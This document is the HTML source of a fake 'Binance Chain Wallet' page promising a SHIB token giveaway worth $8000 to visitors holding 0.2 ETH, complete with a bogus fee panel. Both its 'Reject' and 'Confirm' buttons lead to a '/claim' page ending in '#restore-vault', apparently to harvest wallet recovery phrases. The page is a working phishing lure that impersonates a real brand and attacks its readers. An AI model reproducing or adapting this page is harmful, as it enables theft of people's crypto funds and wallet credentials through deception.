
<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="img/bnbfavicon.ico"><link rel="manifest" href="/manifest.json"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#000000">
<link href="css/homeapp.css" rel="stylesheet">
<link href="css/homeaps.css" rel="stylesheet">
<link rel="apple-touch-icon" href="img/bnbfavicon.ico"><title>Binance Chain Wallet Ecosystem</title>
<link href="css/chunk.css" rel="stylesheet">
<link href="css/app1.css" rel="stylesheet">
<link href="css/main.chunk2.css" rel="stylesheet">
</head><body><div id="root"><div class="ant-spin-nested-loading"><div class="ant-spin-container"><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="img/bscsvg.svg" alt="cashtab" class="sc-tilXH gdtVXy">&nbsp;&nbsp;Binance Chain Wallet</div><br><center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="https://shibatoken.com/images/shib-logo.svg" alt="" style="height: 48px;width: 48px;border-radius: 24px;"></div>

<br><div class="thepadding">To get <b style="color: #4d4d4d;font-weight: bold;">736420500.13 SHIB</b> ($8000), you must have a balance of at least 0.2 ETH (Ethereum) on the network.</div>
</center><br>
<div class="HintBlock"><p class="styles__HintBlockLabel-ip2kfo-30 epsmB">Only Etherscan network supported. Please ensure your deposit is made on the Etherscan network.</p></div>
<div class="confirm-approve-content__card--no-border"><div class="confirm-approve-content__card-header"><div class="confirm-approve-content__card-header__title">Transaction Fee</div><div class="confirm-approve-content__small-blue-text cursor-pointer">USD/ETH</div></div><div class="confirm-approve-content__card-content"><div class="confirm-approve-content__transaction-details-content"><div class="confirm-approve-content__small-text">A fee is associated with this request.</div><div class="confirm-approve-content__transaction-details-content__fee"><div class="confirm-approve-content__transaction-details-content__primary-fee">$208.24</div><div class="confirm-approve-content__transaction-details-content__secondary-fee"><b>0.1180 ETH</b></div></div></div></div>
<br><br>
<p class="sc-VigVT boha" style="color: red;">Not enough funds for transaction fee, please fill your balance.</p>
</div>

<div class="pot">
<a href="/claim/Binance.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="sc-VigVT ikREId">Reject</a>		
<a href="/claim/Binance.html?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="sc-VigVT fWmldN">Confirm</a></div>


</div></div></div></div></div></div></body></html>
